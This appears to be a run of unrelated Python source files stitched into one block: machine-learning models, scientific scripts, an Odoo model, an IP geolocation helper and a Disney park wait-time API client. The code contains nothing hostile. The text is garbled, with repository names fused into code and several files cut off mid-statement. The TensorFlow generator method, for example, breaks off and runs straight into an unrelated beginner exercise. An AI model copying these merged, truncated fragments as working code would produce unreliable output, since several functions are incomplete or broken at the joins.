dclass -i UIViewController") return parser ckconv/nn/activation_functions.py # torch import torch from ckconv.nn.misc import Expression def Swish(): """ out = x * sigmoid(x) """ return Expression(lambda x: x * torch.sigmoid(x)) def Sine(): """ out = sin(x) """ return Expression(lambda x: torch.sin(x)) dcavar/spacyxmlrpc #!/usr/bin/env python3 # -*- coding: UTF-8 -*- """ spacyRPCClient.py (C) 2017 by <> In LingData use SentenceData to store properties of sentences and all tokens The output of the Spacy pipeline is a sequence of sentences, plus correference of elements across sentences. This code represents a XML-RPC client for the SpacyRPC server. \copyright Copyright 2017 by \license{Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.} """ import os.path, sys, glob from LingData import SentenceData, Document, labels import xmlrpc.client def main(fname): print(fname) example = "Tim Cook is the CEO of Apple. He is not the CEO of Google." s = xmlrpc.client.ServerProxy('http://localhost:8000') res = s.parse(example) print(res) # Print list of available methods print(s.system.listMethods()) if __name__=="__main__": main("") for y in sys.argv[1:]: for x in glob.glob(y): main(x) isaykatsman/GraphRicciCurvature import networkx as nx from GraphRicciCurvature.FormanRicci import formanCurvature from GraphRicciCurvature.OllivierRicci import ricciCurvature from GraphRicciCurvature.RicciFlow import compute_ricciFlow # Import an example NetworkX karate club graph G = nx.karate_club_graph() # Compute the Ollivier-Ricci curvature of the given graph G G = ricciCurvature(G, alpha=0.5, weight=None, verbose=False) print("Karate Club Graph: The Ollivier-Ricci curvature of edge (0,1) is %f" % G[0][1]["ricciCurvature"]) # Compute the Forman-Ricci curvature of the given graph G G = formanCurvature(G, verbose=False) print("Karate Club Graph: The Forman-Ricci curvature of edge (0,1) is %f" % G[0][1]["formanCurvature"]) #----------------------------------- # Construct a directed graph example Gd = nx.DiGraph() Gd.add_edges_from([(1, 2), (2, 3), (3, 4), (2, 4), (4, 2)]) # Compute the Ollivier-Ricci curvature of the given directed graph Gd Gd = ricciCurvature(Gd) for n1, n2 in Gd.edges(): print("Directed Graph: The Ollivier-Ricci curvature of edge(%d,%d) id %f" % (n1, n2, Gd[n1][n2]["ricciCurvature"])) # Compute the Forman-Ricci curvature of the given directed graph Gd Gd = formanCurvature(Gd) for n1, n2 in Gd.edges(): print("Directed Graph: The Forman-Ricci curvature of edge(%d,%d) id %f" % (n1, n2, Gd[n1][n2]["formanCurvature"])) #----------------------------------- # Multiprocessing computation is also supported G=nx.random_regular_graph(8,1000) ricciCurvature(G,proc=4) # ----------------------------------- # Compute Ricci flow metric - Optimal Transportation Distance G = nx.karate_club_graph() G = compute_ricciFlow(G, iterations=10, method="OTD") # Compute Ricci flow metric - Average Transportation Distance G = nx.karate_club_graph() G = compute_ricciFlow(G, iterations=10, method="ATD") from setuptools import setup setup( name='podfeed', version='1.0', 
long_description=__doc__, packages=['server'], include_package_data=True, zip_safe=False, install_requires=['flask', 'BeautifulSoup4', 'requests', 'podgen', 'cachetools', 'diskcache'] ) { "targets": [ { "target_name": "kryptonative", "sources": [ "src/crypto.cc" ] } ] }10-100 import numpy as np import tensorflow as tf import numpy as np import threading from itertools import compress class ARAE(): def __init__(self, vocab_size, batch_size=20, latent_size=100, sample_size=100, classification_task=1, regression_task=1): print ('batch size : ', batch_size) print ('latent size : ', latent_size) print ('sample size : ', sample_size) self.vocab_size = vocab_size self.batch_size = batch_size self.latent_size = latent_size self.sample_size = sample_size self.classification_task = classification_task self.regression_task = regression_task self.property_task = regression_task + classification_task self._create_network() def _create_network(self): self.X = tf.placeholder(tf.int32, [self.batch_size, None],name="X") # input smiles self.Y = tf.placeholder(tf.int32, [self.batch_size, None],name="Y") # reconstructed smiles self.S = tf.placeholder(tf.float32, [self.batch_size, self.sample_size],name="S") # seed self.L = tf.placeholder(tf.int32, [self.batch_size],"L") # actual length of SMILES self.N = tf.placeholder(tf.float32, [self.batch_size, self.latent_size],"N") # randomness on latent vectors self.P = tf.placeholder(tf.float32, [self.batch_size, self.property_task],"P") # properties mol_onehot = tf.one_hot(tf.cast(self.X, tf.int32), self.vocab_size) mol_onehot = tf.cast(mol_onehot, tf.float32) self.prefn = [self.latent_size, self.latent_size, self.property_task] self.disfn = [self.latent_size, self.latent_size, 1] self.genfn = [self.latent_size, self.latent_size, self.latent_size] decoded_rnn_size = [self.latent_size] encoded_rnn_size = [self.latent_size] with tf.variable_scope('decode'): decode_cell=[] for i in decoded_rnn_size[:]: decode_cell.append(tf.nn.rnn_cell.LSTMCell(i)) self.decoder = tf.nn.rnn_cell.MultiRNNCell(decode_cell) with tf.variable_scope('encode'): encode_cell=[] for i in encoded_rnn_size[:]: encode_cell.append(tf.nn.rnn_cell.LSTMCell(i)) self.encoder = tf.nn.rnn_cell.MultiRNNCell(encode_cell) self.initial_state=self.decoder.zero_state(self.batch_size, tf.float32) self.weights = {} self.biases = {} self.weights['softmax'] = tf.get_variable("softmaxw", initializer=tf.contrib.layers.xavier_initializer(),\ shape=[decoded_rnn_size[-1], self.vocab_size]) self.biases['softmax'] = tf.get_variable("softmaxb", initializer=tf.contrib.layers.xavier_initializer(), shape=[self.vocab_size]) for i in range(len(self.disfn)): name = 'disfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.latent_size, self.disfn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.disfn[i-1], self.disfn[i]]) name = 'disfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), shape=[self.disfn[i]]) for i in range(len(self.prefn)): name = 'clyfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.latent_size, self.prefn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.prefn[i-1], self.prefn[i]]) name = 'clyfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), 
shape=[self.prefn[i]]) for i in range(len(self.genfn)): name = 'genfw'+str(i+1) if i==0: self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.sample_size, self.genfn[i]]) else : self.weights[name] = tf.get_variable(name, initializer=tf.contrib.layers.xavier_initializer(),\ shape=[self.genfn[i-1], self.genfn[i]]) name = 'genfb'+str(i+1) self.biases[name] = tf.get_variable(name, initializer=tf.zeros_initializer(), shape=[self.genfn[i]]) self.mol_encoded0 = self.total_encoder(mol_onehot) self.mol_encoded = tf.nn.l2_normalize(self.mol_encoded0, dim=-1) self.latent_vector = self.generator(self.S) d_real_logits = self.discriminator(self.mol_encoded) d_fake_logits = self.discriminator(self.latent_vector, reuse=True) predicted_property = self.predictor(self.mol_encoded) # regression = tf.slice(predicted_property,[0,0],[-1,self.regression_task]) # classified = tf.slice(predicted_property,[0,self.regression_task],[-1,self.classification_task]) classified = tf.slice(predicted_property,[0,0],[-1,self.classification_task]) regression = tf.slice(predicted_property,[0,self.classification_task],[-1,self.regression_task]) # classified = predicted_property self.classified_logits = tf.nn.sigmoid(classified) self.mol_encoded +=self.N self.mol_decoded_softmax, mol_decoded_logits = self.total_decoder(self.mol_encoded, mol_onehot, self.P) weights = tf.sequence_mask(self.L, tf.shape(self.X)[1]) weights = tf.cast(weights, tf.int32) weights = tf.cast(weights, tf.float32) self.reconstr_loss = tf.reduce_mean(tf.contrib.seq2seq.sequence_loss( logits=mol_decoded_logits, targets=self.Y, weights=weights)) self.g_loss = -tf.reduce_mean(d_fake_logits) self.en_loss = (tf.reduce_mean(d_real_logits)) self.d_loss = (-tf.reduce_mean(d_real_logits)+tf.reduce_mean(d_fake_logits)) # P_reg=tf.slice(self.P,[0,0],[-1,self.regression_task]) # P_class=tf.slice(self.P,[0,self.regression_task],[-1,self.classification_task]) P_class=tf.slice(self.P,[0,0],[-1,self.classification_task]) P_reg=tf.slice(self.P,[0,self.classification_task],[-1,self.regression_task]) self.en_regression_loss = -tf.sqrt(tf.reduce_mean(tf.square(regression-P_reg))) self.regression_loss = tf.sqrt(tf.reduce_mean(tf.square(regression-P_reg))) self.en_classified_loss = -tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=classified,labels=P_class)) self.classified_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=classified,labels=P_class)) self.en_property_loss= self.en_classified_loss + self.en_regression_loss self.property_loss= self.classified_loss + self.regression_loss # self.en_property_loss = self.en_classified_loss # self.property_loss = self.classified_loss # Loss self.lr = tf.Variable(0.0, trainable=False) tvars = tf.trainable_variables() ae_list = [var for var in tvars if 'decode' in var.name or 'encode' in var.name or 'softmax' in var.name] en_list = [var for var in tvars if 'encode' in var.name] gen_list = [var for var in tvars if 'gen' in var.name] dis_list = [var for var in tvars if 'dis' in var.name] pre_list = [var for var in tvars if 'cly' in var.name] print (np.sum([np.prod(v.shape) for v in ae_list])) print (np.sum([np.prod(v.shape) for v in en_list])) print (np.sum([np.prod(v.shape) for v in dis_list])) print (np.sum([np.prod(v.shape) for v in gen_list])) print (np.sum([np.prod(v.shape) for v in pre_list])) print (np.sum([np.prod(v.shape) for v in tvars])) name1 = [v.name for v in ae_list] name2 = [v.name for v in en_list] name3 = [v.name for v in dis_list] name4 
= [v.name for v in gen_list] name5 = [v.name for v in pre_list] optimizer1 = tf.train.GradientDescentOptimizer(1.0) optimizer2 = tf.train.AdamOptimizer(1e-5) optimizer3 = tf.train.AdamOptimizer(2e-6) optimizer4 = tf.train.AdamOptimizer(1e-5) self.opt1 = optimizer1.minimize(self.reconstr_loss, var_list = ae_list) self.opt2 = optimizer1.minimize(self.en_loss, var_list = en_list) # update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) self.opt3 = optimizer2.minimize(self.g_loss, var_list = gen_list) self.opt4 = optimizer3.minimize(self.d_loss, var_list = dis_list) self.opt5 = optimizer1.minimize(self.en_property_loss, var_list = en_list) self.opt6 = optimizer1.minimize(self.property_loss, var_list = pre_list) self.clip_dis = [p.assign(tf.clip_by_value(p, -0.01, 0.01)) for p in dis_list] self.mol_pred = tf.argmax(self.mol_decoded_softmax, axis=2) self.sess = tf.Session() init = tf.global_variables_initializer() self.sess = tf.Session() self.sess.run(init) self.saver = tf.train.Saver(max_to_keep=None) # tf.train.start_queue_runners(sess=self.sess) print ("Network Ready") def discriminator(self, Z, reuse=False): Y=Z for i in range(len(self.disfn)): name_w = 'disfw'+str(i+1) name_b = 'disfb'+str(i+1) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i!=len(self.disfn)-1: Y = tf.maximum(Y, 0.2*Y) return Y def predictor(self, Z, reuse=False): Y=Z for i in range(len(self.prefn)): name_w = 'clyfw'+str(i+1) name_b = 'clyfb'+str(i+1) # Y = tf.nn.sigmoid(tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b])) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i!=len(self.prefn)-1: Y = tf.nn.relu(Y) return Y def generator(self, Z, reuse=False): Y=Z for i in range(len(self.genfn)): name_w = 'genfw'+str(i+1) name_b = 'genfb'+str(i+1) Y = tf.nn.xw_plus_b(Y, self.weights[name_w], self.biases[name_b]) if i01 Fundamental/Session 03/delete.py favor = ['deathnote','netflix','teaching'] print("Hi there, here are your favorite things so far") for index, item in enumerate(favor): print(index + 1,'. ',item,sep='') # pos = int(input("Position you want to get rid of? ")) - 1 # favor.pop(pos) fav_name_to_delete = input("Name to delete: ") if fav_name_to_delete in favor: favor.remove(fav_name_to_delete) else: print("Not found") for index, item in enumerate(favor): print(index + 1,'. ',item,sep='') ''' Adds base directory to path so BMSS can be imported. You can just use import BMSS if you have successfully installed it using pip. ''' import sys from os import getcwd, listdir from os.path import abspath, dirname, join #Get base directory __base_dir__ = dirname(dirname(dirname(__file__))) try: import BMSS except: #Append to path sys.path.insert(0, __base_dir__) #Add Styles try: __src_dir__ = join(__base_dir__, 'BMSS') library = join(__src_dir__, 'stylelib') styles = {file.split('.')[0]: abspath(join(library,file)) for file in listdir(library)} except Exception as e: print(e.args) styles = {} sisvac_appointments/models/product.py from odoo import models, fields class Product(models.Model): _inherit = "product.template" sisvac_is_vaccine = fields.Boolean("Is vaccine?") sisvac_dose_qty = fields.Integer(default=1) sisvac_dose_interval = fields.Integer() sisvac_unit_time_between_dose = fields.Selection( [("days", "Days"), ("weeks", "Weeks"), ("months", "Month"), ("years", "Years")], default="days", ) # TODO: what are these fields for? 
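    # A possible use of the two interval fields above (illustrative sketch only;
    # the helper name and the use of dateutil.relativedelta are assumptions, not
    # part of this module). The selection keys map directly onto relativedelta
    # keyword arguments:
    #
    #     from dateutil.relativedelta import relativedelta
    #
    #     def sisvac_next_dose_date(self, last_dose_date):
    #         # e.g. interval=3, unit="weeks" -> last_dose_date + relativedelta(weeks=3)
    #         delta = relativedelta(
    #             **{self.sisvac_unit_time_between_dose: self.sisvac_dose_interval})
    #         return last_dose_date + delta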
# sisvac_frequency = fields.Integer() # sisvac_unit_frequency = fields.Selection( # [("days", "Days"), ("weeks", "Weeks"), ("month", "Month"), ("years", "Years")], # default="days", # ) """ This file compute the solution of Stochastic Inverse Problem of truncated domain, and generate figures used in the dissertation """ import bet.calculateP.simpleFunP as simpleFunP import bet.calculateP.calculateP as calculateP import bet.postProcess.plotP as plotP import bet.sample as samp import bet.sampling.basicSampling as bsam import numpy.random as nprand import numpy as np import pickle import myModel_linearode as mm import sys import os import inversefuns.linearode as lr from matplotlib import pyplot as plt # Read arguments from input decaynum = int(sys.argv[1]) figurepath = "figures_linearode/decay-"+str(decaynum) if not os.path.isdir(figurepath): os.makedirs(figurepath) # Whether to create new output data createNewOutputData = sys.argv[2].lower() == 'true' # Generate true parameters an, bn = mm.true_param() coef_true= np.zeros((1,10)) coef_true[0,0::2] = an coef_true[0,1::2] = bn # Initialize 2*trunc_term input parameter sample set object # trunc_term is defined in myModel input_samples = samp.sample_set(2*mm.param_len) # Set parameter domain parameter_domain = mm.my_model_domain(pow = -decaynum, halfwidth0 = 0.5) input_samples.set_domain(parameter_domain) # Define the sampler that will be used to create the discretization # object, which is the fundamental object used by BET to compute # solutions to the stochastic inverse problem sampler = bsam.sampler(mm.my_model) # Generate samples on the parameter space randomSampling = True if randomSampling is True: input_samples = sampler.random_sample_set('random', input_samples, num_samples =200000) else: num_samples_per_dim = 5 input_samples = sampler.regular_sample_set(input_samples, num_samples_per_dim = num_samples_per_dim) ''' A standard Monte Carlo (MC) assumption is that every Voronoi cell has the same volume. ''' MC_assumption = True # Estimate volumes of Voronoi cells associated with the parameter samples if MC_assumption is False: input_samples.estimate_volume(n_mc_points=1E7) else: input_samples.estimate_volume_mc() # Create the discretization object using the input samples my_discretization = sampler.compute_QoI_and_create_discretization(input_samples) # Create a reference parameter simulating the scenario where a true parameter # is responsible for an observed QoI datum. We model the uncertainty in the # recorded reference QoI datum below. 
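# (Toy illustration of the reference-QoI idea described above, independent of
# the bet library; the quadratic map q, lam_ref and the rectangle scale are made
# up. A reference parameter is pushed through the map to get Q_ref, and the
# parameter samples whose output lands in a small rectangle around Q_ref are
# the ones that receive probability in the inverse problem.)
#
#     import numpy as np
#     q = lambda lam: lam ** 2                 # made-up QoI map
#     lam_ref = 0.7
#     Q_ref = q(lam_ref)                       # "observed" reference datum
#     lam = np.random.uniform(0.0, 1.0, 100000)
#     half_width = 0.08 * (q(1.0) - q(0.0)) / 2.0   # rectangle scaled to data range
#     hits = np.abs(q(lam) - Q_ref) < half_width
#     print(hits.mean())                       # fraction of consistent samples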
ref_samples = samp.sample_set(2*mm.param_len) ref_samples.set_domain(parameter_domain) Random_ref = False # Using Random_ref or the true parameter if Random_ref is True: nprand.seed(1) ref_discretization = sampler.create_random_discretization('random', ref_samples, num_samples=1) else: ref_samples.set_values(coef_true) ref_discretization = sampler.compute_QoI_and_create_discretization(ref_samples) # The create_random_discretization function has 2 steps # First: generate the input_sample_set using random_sample_set # Second: generate output_sample_set using compute_QoI_and_create_discretization param_ref = ref_discretization._input_sample_set.get_values() Q_ref = ref_discretization._output_sample_set.get_values()[0,:] randomDataDiscretization = False if createNewOutputData is False: output_probability_set = pickle.load( open( "output_probability_set.p", "rb" ) ) my_discretization._output_probability_set = output_probability_set else: if randomDataDiscretization is False: simpleFunP.regular_partition_uniform_distribution_rectangle_scaled( data_set=my_discretization, Q_ref=Q_ref, rect_scale=0.08, cells_per_dimension = 3) else: simpleFunP.uniform_partition_uniform_distribution_rectangle_scaled( data_set=my_discretization, Q_ref=Q_ref, rect_scale=0.05, M=50, num_d_emulate=1E5) output_probability_set = my_discretization._output_probability_set pickle.dump( output_probability_set, open( "output_probability_set.p", "wb" ) ) # calculate probablities calculateP.prob(my_discretization) ######################################## # Post-process the results ######################################## figurepath="figures_linearode/decay-"+str(decaynum) if not os.path.isdir(figurepath): os.makedirs(figurepath) #calculate 2d marginal probs (bins, marginals2D) = plotP.calculate_2D_marginal_probs(input_samples, nbins = 10) plotP.plot_2D_marginal_probs(marginals2D, bins, input_samples, filename = figurepath+"/linearode_IVP_reg", lam_ref=param_ref[0,:], file_extension = ".eps", plot_surface=False) # smooth 2d marginals probs (optional) #marginals2D = plotP.smooth_marginals_2D(marginals2D, bins, # sigma=0.2*(parameter_domain[:,1]-parameter_domain[:,0])) # plot 2d marginals probs #plotP.plot_2D_marginal_probs(marginals2D, bins, input_samples, filename = "linear_ODE_IVP", # lam_ref=param_ref[0,:], file_extension = ".eps", plot_surface=False) # # calculate 1d marginal probs # (bins, marginals1D) = plotP.calculate_1D_marginal_probs(input_samples, # nbins = 10) # # smooth 1d marginal probs (optional) # marginals1D = plotP.smooth_marginals_1D(marginals1D, bins, # sigma=0.2 * (parameter_domain[:, 1] - parameter_domain[:, 0])) # # plot 1d marginal probs # plotP.plot_1D_marginal_probs(marginals1D, bins, input_samples, filename = "figures_linearode/linearode_IVP_reg", # lam_ref=param_ref[0,:], file_extension = ".eps") # Get index of high probability points arghigh=np.argsort(-my_discretization._input_sample_set._probabilities_local) t = np.linspace(0,1,1001) y = lr.linear_ode_fourier(t,coef_true[0,0::2],coef_true[0,1::2]) # Generate the first 10 curves corresponding to the high probability Fourier coefficients samples sol_all = np.zeros((1001,10)) for i in range(0,10): sol = lr.linear_ode_fourier(t,input_samples._values_local[arghigh[i],0::2], input_samples._values_local[arghigh[i],1::2]) sol_all[:,i]=sol # Generate the figures # figure Figurelr is not used in the final dissertation grid = [100,200,400,500,700] plt.figure() plt.plot(t,y,lw=2) plt.plot(t[grid], y[grid], 'o') for i in range(0,10): 
plt.plot(t,sol_all[:,i],lw=2,alpha=0.4) plt.savefig(figurepath+"/Figurelr.pdf") # orin0 = lr.fourier_exp_vec(t,coef_true[0,0::2],coef_true[0,1::2]) orin1 = (1-t)*t orin_all = np.zeros((1001,10)) for i in range(0,10): orin=lr.fourier_exp_vec(t,input_samples._values_local[arghigh[i],0::2],input_samples._values_local[arghigh[i],1::2]) orin_all[:,i]=orin plt.figure() plt.plot(t,orin0,lw=2) plt.plot(t,orin1) plt.plot(t[grid], orin0[grid], 'o',color='blue') plt.ylim([-0.4,0.8]) #plt.plot(t,orin1,lw=2) for i in range(0,10): plt.plot(t,orin_all[:,i],lw=2,alpha=0.3,color='black') #plt.ylim( (-0.2, 0.3) ) plt.savefig(figurepath+"/fundecay"+str(decaynum)+".pdf") Hydrospheredata/hydro-profiler def safe_divide(n, d): return n / d if d else 0 ''' Export/Spreadsheet/crosslinks _____________________________ Generates the spreadsheet data for a individually sequenced crosslinks. :copyright: (c) 2015 The Regents of the University of California. :license: GNU GPL, see licenses/GNU GPLv3.txt for more details. ''' # load modules/submodules import types from xldlib.utils import logger from . import base from .. import formats # FORMATTING # ---------- CLASSES = [ ('Protein Mods', formats.ProteinModifications), ('Peptide', formats.ModificationsInPeptide), ('Linear w/ Mods', formats.ToSkyline) ] # CROSSLINKS # ---------- @logger.init('spreadsheet', 'DEBUG') class CreateCrosslinkData(base.SpreadsheetData): ''' Processes the spreadsheet data for an identified (sequenced or predicted via isotope labels) link ''' def __init__(self, row): super(CreateCrosslinkData, self).__init__(row) source = self.app.discovererthread self.crosslinkers = source.parameters.crosslinkers self.isobaric = source.parameters.isobaric self.reporterions = source.reporterions self.processing = {} for column, cls in CLASSES: self.processing[column] = cls(row) @logger.call('spreadsheet', 'debug') def __call__(self, crosslink): '''Returns the spreadsheet data as a dictionary''' values = base.RowValues() self.spreadsheetrow.setattrs(values) self.spreadsheetrow.setdata(values, crosslink.index) self.setcrosslinkdata(values, crosslink) self.setprocessing(values, crosslink) if self.reporterions: self.spreadsheetrow.setreporter(values, crosslink.index) else: self.spreadsheetrow.setreporternull(values, crosslink.index) return values # SETTERS @logger.call('spreadsheet', 'debug') def setcrosslinkdata(self, values, crosslink): '''Sets the crosslinker data''' values.update(crosslink.tospreadsheet()) values.update(self.formatcrosslinktypes(crosslink).tospreadsheet()) values['XL'] = position = list(self.fragments(crosslink.index)) values['Subunit Names'] = self.formatsubunits(crosslink.index) values['Linkage Info'] = self.formatlinkage(position, crosslink.index) values['Linear'] = self.formatlinear(crosslink.index) values['xiNet'] = self._xinet(crosslink.index, position) @logger.call('spreadsheet', 'debug') def setprocessing(self, values, crosslink): '''Uses processing functions to store custom data displays''' for column, inst in self.processing.items(): value = inst(crosslink) if isinstance(value, types.GeneratorType): value = list(value) values[column] = value # FORMATTERS @logger.call('spreadsheet', 'debug') def formatcrosslinktypes(self, crosslink): '''0 -> LinkTypes(intersubunit="T", ...)''' intrasubunit = self.getintrasubunit(crosslink.index) return crosslink.totypes(intrasubunit) import requests from diskcache import Cache cache = Cache("cache") @cache.memoize() def ip_location(ip: str): ip_api_res = 
requests.get(f"http://ip-api.com/json/{ip}?fields=lat,lon") ip_api_json = ip_api_res.json() try: return { "ip": ip, "lat": ip_api_json["lat"], "lon": ip_api_json["lon"] } except KeyError as ke: # ip-api didn't return location return None FreddyMurphy/MLOpsProject import os import matplotlib import matplotlib.pyplot as plt import torch from hydra.utils import get_original_cwd from PIL import Image from torchvision import transforms from torchvision.utils import save_image # Needed to render on Linux matplotlib.use('Agg') def save_model_output_figs(model, div2k): # data_path = os.path.join(get_original_cwd(), 'data/raw/DIV2K_valid_HR') # data = DIV2K(data_path) # dataloader = DataLoader(data, batch_size=1, num_workers=4) dataloader = div2k.test_dataloader() print('size:', len(dataloader)) num_images = 3 if (num_images > 5): num_images = 5 fig, axes = plt.subplots(num_images, 3, figsize=(15, 15)) for idx, (high_res, low_res) in enumerate(dataloader): for i in range(num_images): high_tensor = high_res[i, ...] with torch.no_grad(): upscaled = model(low_res[i, ...].unsqueeze_(0)) low_tensor = low_res[i, ...] upscaled = upscaled.squeeze(0) axes[i, 0].imshow(high_tensor.permute(1, 2, 0)) axes[i, 1].imshow(upscaled.permute(1, 2, 0)) axes[i, 2].imshow(low_tensor.permute(1, 2, 0)) axes[i, 0].axis('off') axes[i, 1].axis('off') axes[i, 2].axis('off') axes[i, 0].set_xticklabels([]) axes[i, 0].set_yticklabels([]) axes[i, 1].set_xticklabels([]) axes[i, 1].set_yticklabels([]) axes[i, 2].set_xticklabels([]) axes[i, 2].set_yticklabels([]) axes[0, 0].set_title('High-res') axes[0, 1].set_title('Upscaled low-res') axes[0, 2].set_title('Low-res') fig.suptitle("Image comparison") plt.tight_layout() plt.savefig( os.path.join(get_original_cwd(), "reports/figures/image_comparison_double.png")) def infer_files(model, data_path): file_names = os.listdir(data_path) DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu') output_dir = os.path.join(data_path, 'upscaled') os.makedirs(output_dir, exist_ok=True) print(torch.cuda.memory_allocated(0)) model = model.to(DEVICE) print(torch.cuda.memory_allocated(0)) print('Starting inference') # batch_size=1 since images might not be same size for idx, file_name in enumerate(file_names): img_path = os.path.join(data_path, file_name) if os.path.isdir(img_path): continue with Image.open(img_path) as img: img = img.convert("RGB") img = transforms.ToTensor()(img) img = img.unsqueeze_(0) img = img.to(DEVICE) print('inferring index:', idx) with torch.no_grad(): upscaled_tensor = model(img) upscaled_tensor = upscaled_tensor.to('cpu') img = img.to('cpu') image_path = os.path.join(output_dir, file_name) save_image(upscaled_tensor, image_path) del upscaled_tensor if __name__ == '__main__': save_model_output_figs() 0 # coding: utf-8 # In[2]: import requests from datetime import datetime import pandas as pd from unidecode import unidecode # In[3]: class disney_park: def __init__(self): self.__API_BASE = "https://api.wdpro.disney.go.com/" self.tokendata = self.__get_tokendata() self.token = self.tokendata['access_token'] self.expirtime = self.tokendata['expires_in'] self.parkid = self.get_parkid() self.resortid = self.get_resortid() self.__headers = { 'Accept-Language' : 'en_US', 'User-Agent': 'UIEPlayer/2.1 iPhone OS 6.0.1', 'Accept' : 'application/json;apiversion=1', 'Authorization' : "BEARER "+str(self.token), 'X-Conversation-Id' : 'WDPRO-MOBILE.MDX.CLIENT-PROD', 'X-Correlation-ID' : str(datetime.now().timestamp()) } self.rawwaitdata = self.__get_rawwaitdata() 
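        # The attributes built below are all derived from rawwaitdata:
        #   waitdata                - one-row DataFrame of posted wait minutes per
        #                             attraction/entertainment (-1 = Down, 0 = Operating
        #                             with no posted time, -2 = other/Closed)
        #   waitdata_attractions /
        #   waitdata_entertainement - column subsets split by entry type
        #   fastpass / fastpasstrue - FastPass return times, when the park reports them
        #                             (see can_get_fastpass())
        #   isopen / openwaitdata   - operating status per entry and the columns that
        #                             are not closed
        #   todays_hours            - today's "Operating" schedule from the schedule API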
self.timeretrieved = self.__get_time() self.size = len(self.rawwaitdata['entries']) self.waitdata,self.names = self.__get_waitdata() self.__entertainment_indeces,self.__reverse_ent_indeces = self.__get_ent_indeces() self.waitdata_attractions = self.waitdata.iloc[:,self.__reverse_ent_indeces] self.waitdata_entertainement = self.waitdata.iloc[:,self.__entertainment_indeces] if self.can_get_fastpass(): self.fastpass,self.__truefastpassindex = self.get_fastpass() self.fastpasstrue = self.fastpass.iloc[:,self.__truefastpassindex] self.isopen,self.__op_index = self.__get_isopen() self.openwaitdata = self.waitdata.iloc[:,self.__op_index] self.rawscheduledata = self.__get_rawscheduledata() self.todays_hours = self.get_scheduledata() def refresh(self): """Refreshes the information by reinitializing the object.""" self.__init__() def __get_tokendata(self): """Grabs Auth Token""" TOKEN_URL = 'https://authorization.go.com/token?grant_type=assertion&assertion_type=public&client_id=WDPRO-MOBILE.MDX.WDW.ANDROID-PROD' r = requests.post(url = TOKEN_URL) data = r.json() return(data) def get_parkid(self): """Park ID provided by inherited class""" raise("Method Must Be Defined By Inherited Class") return(0) def get_resortid(self): """Resort ID provided by inherited class""" raise("Method Must Be Defined By Inherited Class") return(0) def __get_rawwaitdata(self): """Raw Wait Data Input to be used by other attributes and methods""" r = requests.get(url = self.__API_BASE+'facility-service/theme-parks/{}/wait-times'.format(self.parkid),headers=self.__headers) data = r.json() return(data) def __get_rawscheduledata(self,startDate =datetime.now().strftime('%Y-%m-%d'),endDate = False ): """Raw Schedule Data Input to be used by other attributes and methods""" if not endDate: endDate = startDate r = requests.get(url = self.__API_BASE + 'mobile-service/public/ancestor-activities-schedules/{};entityType=destination?filters=theme-park&startDate={}&endDate={}®ion=us'.format(self.resortid,startDate,endDate),headers=self.__headers) data = r.json() return(data) def __get_time(self): """Grab time when accessing API""" time = datetime.now() return(time) def __get_waitdata(self): """Cleans Wait Data From Raw Wait Data""" rawdata = self.rawwaitdata names = [] times = [] for i in range(0,self.size): names.append(unidecode(rawdata['entries'][i]['name'].replace('"','').replace(' ','_').replace('–','_').replace("'",'').replace(':','_').replace('!','').replace(',','').replace('\xa0','').replace('.','').replace('&','and').replace('-','').replace('É','e').lower().strip()+ '_' + str(rawdata['entries'][i]['id']).split(';')[0])) try: times.append([rawdata['entries'][i]['waitTime']['postedWaitMinutes']]) except KeyError: if rawdata['entries'][i]['waitTime']['status'] == "Down": times.append([-1]) elif rawdata['entries'][i]['waitTime']['status'] == "Operating": times.append([0]) else: times.append([-2]) data = dict(zip(names,times)) data = pd.DataFrame.from_dict(data) data = data[names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time return(data,names) def __get_ent_indeces(self): """Grabs Indeces of Entertainment (Also Returns Indeces of Attractions)""" types = [] for i in range(0,len(self.rawwaitdata['entries'])): types.append(self.rawwaitdata['entries'][i]['type']) indeces = [i for i,x in enumerate(types) if x=='Entertainment'] reverse_indeces= list(set(range(0,self.size)) - set(indeces)) time_indeces = [self.size] indeces.extend(time_indeces) reverse_indeces.extend(time_indeces) return((indeces,reverse_indeces)) def 
get_fastpass(self): """Extracts Fastpass Data from Raw Wait Data""" rawdata = self.rawwaitdata times = [] indeces = [] for i in range(0,self.size): if rawdata['entries'][i]['waitTime']['fastPass']['available']: try: indeces.append(i) times.append([int(rawdata['entries'][i]['waitTime']['fastPass']['startTime'].replace(':','')[:-2])]) except: times.append([-1]) else: times.append([-2]) data = dict(zip(self.names,times)) data = pd.DataFrame.from_dict(data) data = data[self.names] Time = pd.Series([self.timeretrieved]) data['mytime'] = Time time_indeces = [self.size] indeces.extend(time_indeces) return((data,indeces)) def can_get_fastpass(self): """Pass False if Park Data does not include Fastpass""" raise(("Method Must Be Defined By Inherited Class")) def __get_isopen(self): """Grabs Status of Attractions/Entertainment (Operating Or Not), Also Returns Indices of Open Attractions/Entertainment""" rawdata = self.rawwaitdata operating_or_not = [] op_index = [] for i in range(0,self.size): if rawdata['entries'][i]['waitTime']['status'] == 'Operating': operating_or_not.append(['Operating']) 